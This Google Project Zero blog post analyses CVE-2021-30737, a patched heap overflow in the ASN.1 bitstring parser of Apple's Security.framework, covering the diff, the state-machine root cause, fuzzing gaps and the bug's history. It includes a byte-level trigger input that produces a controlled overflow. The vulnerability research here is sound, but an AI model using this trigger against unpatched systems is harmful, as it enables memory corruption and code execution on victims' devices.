The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability

By: Anonymous
7 April 2022 at 16:08

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability found by @xerub. Phrack published @xerub's writeup so go check that out first.

As well as doing my own vulnerability research I also spend time trying as best as I can to keep up with the public state-of-the-art, especially when details of a particularly interesting vulnerability are announced or a new in-the-wild exploit is caught. Originally this post was just a series of notes I took last year as I was trying to understand this bug. But the bug itself and the narrative around it are so fascinating that I thought it would be worth writing up these notes into a more coherent form to share with the community.

Background

On April 14th 2021 the Washington Post published an article on the unlocking of the San Bernardino iPhone by Azimuth containing a nugget of non-public information:

"Azimuth specialized in finding significant vulnerabilities. Dowd [...] had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person."

There's not that much Mozilla code running on an iPhone and even less which is likely to be part of such an attack surface. Therefore, if accurate, this quote almost certainly meant that Azimuth had exploited a vulnerability in the ASN.1 parser used by Security.framework, which is a fork of Mozilla's NSS ASN.1 parser.

I searched around in bugzilla (Mozilla's issue tracker) looking for candidate vulnerabilities which matched the timeline discussed in the Post article and narrowed it down to a handful of plausible bugs including: 1202868, 1192028, 1245528.

I was surprised that there had been so many exploitable-looking issues in the ASN.1 code and decided to add auditing the NSS ASN.1 parser as an quarterly goal.

A month later, having predictably done absolutely nothing more towards that goal, I saw this tweet from @xerub:

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021

The shameless excerpt reads:

// This is the real deal. Take no chances, take no prisoners! I AM THE STATE MACHINE!

And CVE-2021-30737, fixed in iOS 14.6 was described in the iOS release notes as:

Screenshot of text. Transcript: Security. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution. Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code. CVE-2021-30737: xerub

Impact: Processing a maliciously crafted certification may lead to arbitrary code execution

Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code.

Feeling slightly annoyed that I hadn't acted on my instincts as there was clearly something awesome lurking there I made a mental note to diff the source code once Apple released it which they finally did a few weeks later on opensource.apple.com in the Security package.

Here's the diff between the MacOS 11.4 and 11.3 versions of secasn1d.c which contains the ASN.1 parser:

diff --git a/OSX/libsecurity_asn1/lib/secasn1d.c b/OSX/libsecurity_asn1/lib/secasn1d.c

index f338527..5b4915a 100644

--- a/OSX/libsecurity_asn1/lib/secasn1d.c

+++ b/OSX/libsecurity_asn1/lib/secasn1d.c

@@ -434,9 +434,6 @@ loser:

         PORT_ArenaRelease(cx->our_pool, state->our_mark);

         state->our_mark = NULL;

     }

-    if (new_state != NULL) {

-        PORT_Free(new_state);

-    }

     return NULL;

 }

 

@@ -1794,19 +1791,13 @@ sec_asn1d_parse_bit_string (sec_asn1d_state *state,

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if ((state->pending == 0) || (state->contents_length == 1)) {

+    if (state->pending == 0) {

                if (state->dest != NULL) {

                        SecAsn1Item *item = (SecAsn1Item *)(state->dest);

                        item->Data = NULL;

                        item->Length = 0;

                        state->place = beforeEndOfContents;

-               }

-               if(state->contents_length == 1) {

-                       /* skip over (unused) remainder byte */

-                       return 1;

-               }

-               else {

-                       return 0;

+            return 0;

                }

     }

The first change (removing the PORT_Free) is immaterial for Apple's use case as it's fixing a double free which doesn't impact Apple's build. It's only relevant when "allocator marks" are enabled and this feature is disabled.

The vulnerability must therefore be in sec_asn1d_parse_bit_string. We know from xerub's tweet that something goes wrong with a state machine, but to figure it out we need to cover some ASN.1 basics and then start looking at how the NSS ASN.1 state machine works.

ASN.1 encoding

ASN.1 is a Type-Length-Value serialization format, but with the neat quirk that it can also handle the case when you don't know the length of the value, but want to serialize it anyway! That quirk is only possible when ASN.1 is encoded according to Basic Encoding Rules (BER.) There is a stricter encoding called DER (Distinguished Encoding Rules) which enforces that a particular value only has a single correct encoding and disallows the cases where you can serialize values without knowing their eventual lengths.

This page is a nice beginner's guide to ASN.1. I'd really recommend skimming that to get a good overview of ASN.1.

There are a lot of built-in types in ASN.1. I'm only going to describe the minimum required to understand this vulnerability (mostly because I don't know any more than that!) So let's just start from the very first byte of a serialized ASN.1 object and figure out how to decode it:

This first byte tells you the type, with the least significant 5 bits defining the type identifier. The special type identifier value of 0x1f tells you that the type identifier doesn't fit in those 5 bits and is instead encoded in a different way (which we'll ignore):

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.

The upper two bits of the first byte tell you the class of the type: universal, application, content-specific or private. For us, we'll leave that as 0 (universal.)

Bit 6 is where the fun starts. A value of 1 tells us that this is a primitive encoding which means that following the length are content bytes which can be directly interpreted as the intended type. For example, a primitive encoding of the string "HELLO" as an ASN.1 printable string would have a length byte of 5 followed by the ASCII characters "HELLO". All fairly straightforward.

A value of 0 for bit 6 however tells us that this is a constructed encoding. This means that the bytes following the length are not the "raw" content bytes for the type but are instead ASN.1 encodings of one or more "chunks" which need to be individually parsed and concatenated to form the final output value. And to make things extra complicated it's also possible to specify a length value of 0 which means that you don't even know how long the reconstructed output will be or how much of the subsequent input will be required to completely build the output.

This final case (of a constructed type with indefinite length) is known as indefinite form. The end of the input which makes up a single indefinite value is signaled by a serialized type with the identifier, constructed, class and length values all equal to 0 , which is encoded as two NULL bytes.

ASN.1 bitstrings

Most of the ASN.1 string types require no special treatment; they're just buffers of raw bytes. Some of them have length restrictions. For example: a BMP string must have an even length and a UNIVERSAL string must be a multiple of 4 bytes in length, but that's about it.

ASN.1 bitstrings are strings of bits as opposed to bytes. You could for example have a bitstring with a length of a single bit (so either a 0 or 1) or a bitstring with a length of 127 bits (so 15 full bytes plus an extra 7 bits.)

Encoded ASN.1 bitstrings have an extra metadata byte after the length but before the contents, which encodes the number of unused bits in the final byte.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

Parsing ASN.1

ASN.1 data always needs to be decoded in tandem with a template that tells the parser what data to expect and also provides output pointers to be filled in with the parsed output data. Here's the template my test program uses to exercise the bitstring code:

const SecAsn1Template simple_bitstring_template[] = {

  {

    SEC_ASN1_BIT_STRING | SEC_ASN1_MAY_STREAM, // kind: bit string,

                                         //  may be constructed

    0,     // offset: in dest/src

    NULL,  // sub: subtemplate for indirection

    sizeof(SecAsn1Item) // size: of output structure

  }

};

A SecASN1Item is a very simple wrapper around a buffer. We can provide a SecAsn1Item for the parser to use to return the parsed bitstring then call the parser:

SecAsn1Item decoded = {0};

PLArenaPool* pool = PORT_NewArena(1024);

SECStatus status =

  SEC_ASN1Decode(pool,     // pool: arena for destination allocations

                 &decoded, // dest: decoded encoded items in to here

                 &simple_bitstring_template, // template

                 asn1_bytes,      // buf: asn1 input bytes

                 asn1_bytes_len); // len: input size

NSS ASN.1 state machine

The state machine has two core data structures:

SEC_ASN1DecoderContext - the overall parsing context

sec_asn1d_state - a single parser state, kept in a doubly-linked list forming a stack of nested states

Here's a trimmed version of the state object showing the relevant fields:

typedef struct sec_asn1d_state_struct {

  SEC_ASN1DecoderContext *top; 

  const SecAsn1Template *theTemplate;

  void *dest;

 

  struct sec_asn1d_state_struct *parent;

  struct sec_asn1d_state_struct *child;

 

  sec_asn1d_parse_place place;

 

  unsigned long contents_length;

  unsigned long pending;

  unsigned long consumed;

  int depth;

} sec_asn1d_state;

The main engine of the parsing state machine is the method SEC_ASN1DecoderUpdate which takes a context object, raw input buffer and length:

SECStatus

SEC_ASN1DecoderUpdate (SEC_ASN1DecoderContext *cx,

                       const char *buf, size_t len)

The current state is stored in the context object's current field, and that current state's place field determines the current state which the parser is in. Those states are defined here:

​​typedef enum {

    beforeIdentifier,

    duringIdentifier,

    afterIdentifier,

    beforeLength,

    duringLength,

    afterLength,

    beforeBitString,

    duringBitString,

    duringConstructedString,

    duringGroup,

    duringLeaf,

    duringSaveEncoding,

    duringSequence,

    afterConstructedString,

    afterGroup,

    afterExplicit,

    afterImplicit,

    afterInline,

    afterPointer,

    afterSaveEncoding,

    beforeEndOfContents,

    duringEndOfContents,

    afterEndOfContents,

    beforeChoice,

    duringChoice,

    afterChoice,

    notInUse

} sec_asn1d_parse_place;

The state machine loop switches on the place field to determine which method to call:

  switch (state->place) {

    case beforeIdentifier:

      consumed = sec_asn1d_parse_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case duringIdentifier:

      consumed = sec_asn1d_parse_more_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case afterIdentifier:

      sec_asn1d_confirm_identifier (state);

      break;

...

Each state method which could consume input is passed a pointer (buf) to the next unconsumed byte in the raw input buffer and a count of the remaining unconsumed bytes (len).

It's then up to each of those methods to return how much of the input they consumed, and signal any errors by updating the context object's status field.

The parser can be recursive: a state can set its ->place field to a state which expects to handle a parsed child state and then allocate a new child state. For example when parsing an ASN.1 sequence:

  state->place = duringSequence;

  state = sec_asn1d_push_state (state->top, state->theTemplate + 1,

                                state->dest, PR_TRUE);

The current state sets its own next state to duringSequence then calls sec_asn1d_push_state which allocates a new state object, with a new template and a copy of the parent's dest field.

sec_asn1d_push_state updates the context's current field such that the next loop around SEC_ASN1DecoderUpdate will see this child state as the current state:

    cx->current = new_state;

Note that the initial value of the place field (which determines the current state) of the newly allocated child is determined by the template. The final state in the state machine path followed by that child will then be responsible for popping itself off the state stack such that the duringSequence state can be reached by its parent to consume the results of the child.

Buffer management

The buffer management is where the NSS ASN.1 parser starts to get really mind bending. If you read through the code you will notice an extreme lack of bounds checks when the output buffers are being filled in - there basically are none. For example, sec_asn1d_parse_leaf which copies the raw encoded string bytes for example simply memcpy's into the output buffer with no bounds checks that the length of the string matches the size of the buffer.

Rather than using explicit bounds checks to ensure lengths are valid, the memory safety is instead supposed to be achieved by relying on the fact that decoding valid ASN.1 can never produce output which is larger than its input.

That is, there are no forms of decompression or input expansion so any parsed output data must be equal to or shorter in length than the input which encoded it. NSS leverages this and over-allocates all output buffers to simply be as large as their inputs.

For primitive strings this is quite simple: the length and input are provided so there's nothing really to go that wrong. But for constructed strings this gets a little fiddly...

One way to think of constructed strings is as trees of substrings, nested up to 32-levels deep. Here's an example:

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.

We start with a constructed definite length string. The string's length value L is the complete size of the remaining input which makes up this string; that number of input bytes should be parsed as substrings and concatenated to form the parsed output.

At this point the NSS ASN.1 string parser allocates the output buffer for the parsed output string using the length L of that first input string. This buffer is an over-allocated worst case. The part which makes it really fun though is that NSS allocates the output buffer then promptly throws away that length! This might not be so obvious from quickly glancing through the code though. The buffer which is allocated is stored as the Data field of a buffer wrapper type:

typedef struct cssm_data {

    size_t Length;

    uint8_t * __nullable Data;

} SecAsn1Item, SecAsn1Oid;

(Recall that we passed in a pointer to a SecAsn1Item in the template; it's the Data field of that which gets filled in with the allocated string buffer pointer here. This type is very slightly different between NSS and Apple's fork, but the difference doesn't matter here.)

That Length field is not the size of the allocated Data buffer. It's a (type-specific) count which determines how many bits or bytes of the buffer pointed to by Data are valid. I say type-specific because for bit-strings Length is stored in units of bits but for other strings it's in units of bytes. (CVE-2016-1950 was a bug in NSS where the code mixed up those units.)

Rather than storing the allocated buffer size along with the buffer pointer, each time a substring/child string is encountered the parser walks back up the stack of currently-being-parsed states to find the inner-most definite length string. As it's walking up the states it examines each state to determine how much of its input it has consumed in order to be able to determine whether it's the case that the current to-be-parsed substring is indeed completely enclosed within the inner-most enclosing definite length string.

If that sounds complicated, it is! The logic which does this is here, and it took me a good few days to pull it apart enough to figure out what this was doing:

sec_asn1d_state *parent = sec_asn1d_get_enclosing_construct(state);

while (parent && parent->indefinite) {

  parent = sec_asn1d_get_enclosing_construct(parent);

}

unsigned long remaining = parent->pending;

parent = state;

do {

  if (!sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->consumed,

                                           state->top)

      ||

      /* If parent->indefinite is true, parent->contents_length is

       * zero and this is a no-op. */

      !sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->contents_length,

                                           state->top)

      ||

      /* If parent->indefinite is true, then ensure there is enough

       * space for an EOC tag of 2 bytes. */

      (  parent->indefinite

          &&

          !sec_asn1d_check_and_subtract_length(&remaining,

                                               2,

                                               state->top)

      )

    ) {

      /* This element is larger than its enclosing element, which is

       * invalid. */

       return;

    }

} while ((parent = sec_asn1d_get_enclosing_construct(parent))

         &&

         parent->indefinite);

It first walks up the state stack to find the innermost constructed definite state and uses its state->pending value as an upper bound. It then walks the state stack again and for each in-between state subtracts from that original value of pending how many bytes could have been consumed by those in between states. It's pretty clear that the pending value is therefore vitally important; it's used to determine an upper bound so if we could mess with it this "bounds check" could go wrong.

After figuring out that this was pretty clearly the only place where any kind of bounds checking takes place I looked back at the fix more closely.

We know that sec_asn1d_parse_bit_string is only the function which changed:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

   

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

   

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

   

    byte = (unsigned char) *buf;

    if (byte > 7) {

        dprintf("decodeError: parse_bit_string remainder oflow\n");

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

   

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

   

    return 1;

}

The highlighted region of the function are the characters which were removed by the patch. This function is meant to return the number of input bytes (pointed to by buf) which it consumed and my initial hunch was to notice that the patch removed a path through this function where you could get the count of input bytes consumed and pending out-of-sync. It should be the case that when they return 1 in the removed code they also decrement state->pending, as they do in the other place where this function returns 1.

I spent quite a while trying to figure out how you could actually turn that into something useful but in the end I don't think you can.

So what else is going on here?

This state is reached with buf pointing to the first byte after the length value of a primitive bitstring. state->contents_length is the value of that parsed length. Bitstrings, as discussed earlier, are a unique ASN.1 string type in that they have an extra meta-data byte at the beginning (the unused-bits count byte.) It's perfectly fine to have a definite zero-length string - indeed that's (sort-of) handled earlier than this in the prepareForContents state, which short-circuits straight to afterEndOfContents:

if (state->contents_length == 0 && (! state->indefinite)) {

  /*

   * A zero-length simple or constructed string; we are done.

   */

  state->place = afterEndOfContents;

Here they're detecting a definite-length string type with a content length of 0. But this doesn't handle the edge case of a bitstring which consists only of the unused-bits count byte. The state->contents_length value of that bitstring will be 1, but it doesn't actually have any "contents".

It's this case which the (state->contents_length == 1) conditional in sec_asn1d_parse_bit_string matches:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

By setting state->place to beforeEndOfContents they are again trying to short-circuit the state machine to skip ahead to the state after the string contents have been consumed. But here they take an additional step which they didn't take when trying to achieve exactly the same thing in prepareForContents. In addition to updating state->place they also NULL out the dest SecAsn1Item's Data field and set the Length to 0.

I mentioned earlier that the new child states which are allocated to recursively parse the sub-strings of constructed strings get a copy of the parent's dest field (which is a pointer to a pointer to the output buffer.) This makes sense: that output buffer is only allocated once then gets recursively filled-in in a linear fashion by the children. (Technically this isn't actually how it works if the outermost string is indefinite length, there's separate handling for that case which instead builds a linked-list of substrings which are eventually concatenated, see sec_asn1d_concat_substrings.)

If the output buffer is only allocated once, what happens if you set Data to NULL like they do here? Taking a step back, does that actually make any sense at all?

No, I don't think it makes any sense. Setting Data to NULL at this point should at the very least cause a memory leak, as it's the only pointer to the output buffer.

The fun part though is that that's not the only consequence of NULLing out that pointer. item->Data is used to signal something else.

Here's a snippet from prepare_for_contents when it's determining whether there's enough space in the output buffer for this substring

} else if (state->substring) {

  /*

   * If we are a substring of a constructed string, then we may

   * not have to allocate anything (because our parent, the

   * actual constructed string, did it for us).  If we are a

   * substring and we *do* have to allocate, that means our

   * parent is an indefinite-length, so we allocate from our pool;

   * later our parent will copy our string into the aggregated

   * whole and free our pool allocation.

   */

  if (item->Data == NULL) {

    PORT_Assert (item->Length == 0);

    poolp = state->top->our_pool;

  } else {

    alloc_len = 0;

  }

As the comment implies, if both item->Data is NULL at this point and state->substring is true, then (they believe) it must be the case that they are currently parsing a substring of an outer-level indefinite string, which has no definite-sized buffer already allocated. In that case the meaning of the item->Data pointer is different to that which we describe earlier: it's merely a temporary buffer meant to hold only this substring. Just above here alloc_len was set to the content length of this substring; and for the outer-definite-length case it's vitally important that alloc_len then gets set to 0 here (which is really indicating that a buffer has already been allocated and they must not allocate a new one.)

To emphasize the potentially subtle point: the issue is that using this conjunction (state->substring && !item->Data) for determining whether this a substring of a definite length or outer-level-indefinite string is not the same as the method used by the convoluted bounds checking code we saw earlier. That method walks up the current state stack and checks the indefinite bits of the super-strings to determine whether they're processing a substring of an outer-level-indefinite string.

Putting that all together, you might be able to see where this is going... (but it is still pretty subtle.)

Assume that we have an outer definite-length constructed bitstring with three primitive bitstrings as substrings:

Upon encountering the first outer-most definite length constructed bitstring, the code will allocate a fixed-size buffer, large enough to store all the remaining input which makes up this string, which in this case is 42 bytes. At this point dest->Data points to that buffer.

They then allocate a child state, which gets a copy of the dest pointer (not a copy of the dest SecAsn1Item object; a copy of a pointer to it), and proceed to parse the first child substring.

This is a primitive bitstring with a length of 1 which triggers the vulnerable path in sec_asn1d_parse_bit_string and sets dest->Data to NULL. The state machine skips ahead to beforeEndOfContents then eventually the next substring gets parsed - this time with dest->Data == NULL.

Now the logic goes wrong in a bad way and, as we saw in the snippet above, a new dest->Data buffer gets allocated which is the size of only this substring (2 bytes) when in fact dest->Data should already point to a buffer large enough to hold the entire outer-level-indefinite input string. This bitstring's contents then get parsed and copied into that buffer.

Now we come to the third substring. dest->Data is no longer NULL; but the code now has no way of determining that the buffer was in fact only (erroneously) allocated to hold a single substring. It believes the invariant that item->Data only gets allocated once, when the first outer-level definite length string is encountered, and it's that fact alone which it uses to determine whether dest->Data points to a buffer large enough to have this substring appended to it. It then happily appends this third substring, writing outside the bounds of the buffer allocated to store only the second substring.

This gives you a great memory corruption primitive: you can cause allocations of a controlled size and then overflow them with an arbitrary number of arbitrary bytes.

Here's an example encoding for an ASN.1 bitstring which triggers this issue:

   uint8_t concat_bitstrings_constructed_definite_with_zero_len_realloc[]

        = {ASN1_CLASS_UNIVERSAL | ASN1_CONSTRUCTED | ASN1_BIT_STRING, // (0x23)

           0x4a, // initial allocation size

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x1, // force item->Data = NULL

           0x0, // number of unused bits in the final byte

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x2, // this is the reallocation size

           0x0, // number of unused bits in the final byte

           0xff, // only byte of bitstring

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x41, // 64 actual bytes, plus the remainder, will cause 0x40 byte memcpy one byte in to 2 byte allocation

           0x0, // number of unused bits in the final byte

           0xff,

           0xff,// -- continues for overflow

Why wasn't this found by fuzzing?

This is a reasonable question to ask. This source code is really really hard to audit, even with the diff it was at least a week of work to figure out the true root cause of the bug. I'm not sure if I would have spotted this issue during a code audit. It's very broken but it's quite subtle and you have to figure out a lot about the state machine and the bounds-checking rules to see it - I think I might have given up before I figured it out and gone to look for something easier.

But the trigger test-case is neither structurally complex nor large, and feels within-grasp for a fuzzer. So why wasn't it found? I'll offer two points for discussion:

Perhaps it's not being fuzzed?

Or at least, it's not being fuzzed in the exact form which it appears in Apple's Security.framework library. I understand that both Mozilla and Google do fuzz the NSS ASN.1 parser and have found a bunch of vulnerabilities, but note that the key part of the vulnerable code ("|| (state->contents_length == 1" in sec_asn1d_parse_bit_string) isn't present in upstream NSS (more on that below.)

Can it be fuzzed effectively?

Even if you did build the Security.framework version of the code and used a coverage guided fuzzer, you might well not trigger any crashes. The code uses a custom heap allocator and you'd have to either replace that with direct calls to the system allocator or use ASAN's custom allocator hooks. Note that upstream NSS does do that, but as I understand it, Apple's fork doesn't.

History

I'm always interested in not just understanding how a vulnerability works but how it was introduced. This case is a particularly compelling example because once you understand the bug, the code construct initially looks extremely suspicious. It only exists in Apple's fork of NSS and the only impact of that change is to introduce a perfect memory corruption primitive. But let's go through the history of the code to convince ourselves that it is much more likely that it was just an unfortunate accident:

The earliest reference to this code I can find is this, which appears to be the initial checkin in the Mozilla CVS repo on March 31, 2000:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

    PORT_Assert (state->pending > 0);

    PORT_Assert (state->place == beforeBitString);

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

On August 24th, 2001 the form of the code changed to something like the current version, in this commit with the message "Memory leak fixes.":

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

-   PORT_Assert (state->pending > 0);

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

+   if (state->pending == 0) {

+       if (state->dest != NULL) {

+           SECItem *item = (SECItem *)(state->dest);

+           item->data = NULL;

+           item->len = 0;

+           state->place = beforeEndOfContents;

+           return 0;

+       }

+   }

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

This commit added the item->data = NULL line but here it's only reachable when pending == 0. I am fairly convinced that this was dead code and not actually reachable (and that the PORT_Assert which they commented out was actually valid.)

The beforeBitString state (which leads to the sec_asn1d_parse_bit_string method being called) will always be preceded by the afterLength state (implemented by sec_asn1d_prepare_for_contents.) On entry to the afterLength state state->contents_length is equal to the parsed length field and  sec_asn1d_prepare_for_contents does:

state->pending = state->contents_length;

So in order to reach sec_asn1d_parse_bit_string with state->pending == 0, state->contents_length would also need to be 0 in sec_asn1d_prepare_for_contents.

That means that in the if/else decision tree below, at least one of the two conditionals must be true:

        if (state->contents_length == 0 && (! state->indefinite)) {

            /*

             * A zero-length simple or constructed string; we are done.

             */

            state->place = afterEndOfContents;

...

        } else if (state->indefinite) {

            /*

             * An indefinite-length string *must* be constructed!

             */

            dprintf("decodeError: prepare for contents indefinite not construncted\n");

            PORT_SetError (SEC_ERROR_BAD_DER);

            state->top->status = decodeError;

yet it is required that neither of those be true in order to reach the final else which is the only path to reaching sec_asn1d_parse_bit_string via the beforeBitString state:

        } else {

            /*

             * A non-zero-length simple string.

             */

            if (state->underlying_kind == SEC_ASN1_BIT_STRING)

                state->place = beforeBitString;

            else

                state->place = duringLeaf;

        }

So at that point (24 August 2001) the NSS codebase had some dead code which looked like it was trying to handle parsing an ASN.1 bitstring which didn't have an unused-bits byte. As we've seen in the rest of this post though, that handling is quite wrong, but it didn't matter as the code was unreachable.

The earliest reference to Apple's fork of that NSS code I can find is in the SecurityNssAsn1-11 package for OS X 10.3 (Panther) which would have been released October 24th, 2003. In that project we can find a CHANGES.apple file which tells us a little more about the origins of Apple's fork:

General Notes

-------------

1. This module, SecurityNssAsn1, is based on the Netscape Security

   Services ("NSS") portion of the Mozilla Browser project. The

   source upon which SecurityNssAsn1 was based was pulled from

   the Mozilla CVS repository, top of tree as of January 21, 2003.

   The SecurityNssAsn1 project contains only those portions of NSS

   used to perform BER encoding and decoding, along with minimal

   support required by the encode/decode routines.

2. The directory structure of SecurityNssAsn1 differs significantly

   from that of NSS, rendering simple diffs to document changes

   unwieldy. Diffs could still be performed on a file-by-file basis.

   

3. All Apple changes are flagged by the symbol __APPLE__, either

   via "#ifdef __APPLE__" or in a comment.

That document continues on to outline a number of broad changes which Apple made to the code, including reformatting the code and changing a number of APIs to add new features. We also learn the date at which Apple forked the code (January 21, 2003) so we can go back through a github mirror of the mozilla CVS repository to find the version of secasn1d.c as it would have appeared then and diff them.

From that diff we can see that the Apple developers actually made fairly significant changes in this initial import, indicating that this code underwent some level of review prior to importing it. For example:

@@ -1584,7 +1692,15 @@

     /*

      * If our child was just our end-of-contents octets, we are done.

      */

+       #ifdef  __APPLE__

+       /*

+        * Without the check for !child->indefinite, this path could

+        * be taken erroneously if the child is indefinite!

+        */

+       if(child->endofcontents && !child->indefinite) {

+       #else

     if (child->endofcontents) {

They were pretty clearly looking for potential correctness issues with the code while they were refactoring it. The example shown above is a non-trivial change and one which persists to this day. (And I have no idea whether the NSS or Apple version is correct!) Reading the diff we can see that not every change ended up being marked with #ifdef __APPLE__ or a comment. They also made this change to sec_asn1d_parse_bit_string:

@@ -1372,26 +1469,33 @@

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if (state->pending == 0) {

-       if (state->dest != NULL) {

-           SECItem *item = (SECItem *)(state->dest);

-           item->data = NULL;

-           item->len = 0;

-           state->place = beforeEndOfContents;

-           return 0;

-       }

+    if ((state->pending == 0) || (state->contents_length == 1)) {

+               if (state->dest != NULL) {

+                       SECItem *item = (SECItem *)(state->dest);

+                       item->Data = NULL;

+                       item->Length = 0;

+                       state->place = beforeEndOfContents;

+               }

+               if(state->contents_length == 1) {

+                       /* skip over (unused) remainder byte */

+                       return 1;

+               }

+               else {

+                       return 0;

+               }

     }

In the context of all the other changes in this initial import this change looks much less suspicious than I first thought. My guess is that the Apple developers thought that Mozilla had missed handling the case of a bitstring with only the unused-bits bytes and attempted to add support for it. It looks like the state->pending == 0 conditional must have been Mozilla's check for handling a 0-length bitstring so therefore it was quite reasonable to think that the way it was handling that case by NULLing out item->data was the right thing to do, so it must also be correct to add the contents_length == 1 case here.

In reality the contents_length == 1 case was handled perfectly correctly anyway in sec_asn1d_parse_more_bit_string, but it wasn't unreasonable to assume that it had been overlooked based on what looked like a special case handling for the missing unused-bits byte in sec_asn1d_parse_bit_string.

The fix for the bug was simply to revert the change made during the initial import 18 years ago, making the dangerous but unreachable code unreachable once more:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

Conclusions

Forking complicated code is complicated. In this case it took almost two decades to in the end just revert a change made during import. Even verifying whether this revert is correct is really hard.

The Mozilla and Apple codebases have continued to diverge since 2003. As I discovered slightly too late to be useful, the Mozilla code now has more comments trying to explain the decoder's "novel" memory safety approach.

Rewriting this code to be more understandable (and maybe even memory safe) is also distinctly non-trivial. The code doesn't just implement ASN.1 decoding; it also has to support safely decoding incorrectly encoded data, as described by this verbatim comment for example:

 /*

  * Okay, this is a hack.  It *should* be an error whether

  * pending is too big or too small, but it turns out that

  * we had a bug in our *old* DER encoder that ended up

  * counting an explicit header twice in the case where

  * the underlying type was an ANY.  So, because we cannot

  * prevent receiving these (our own certificate server can

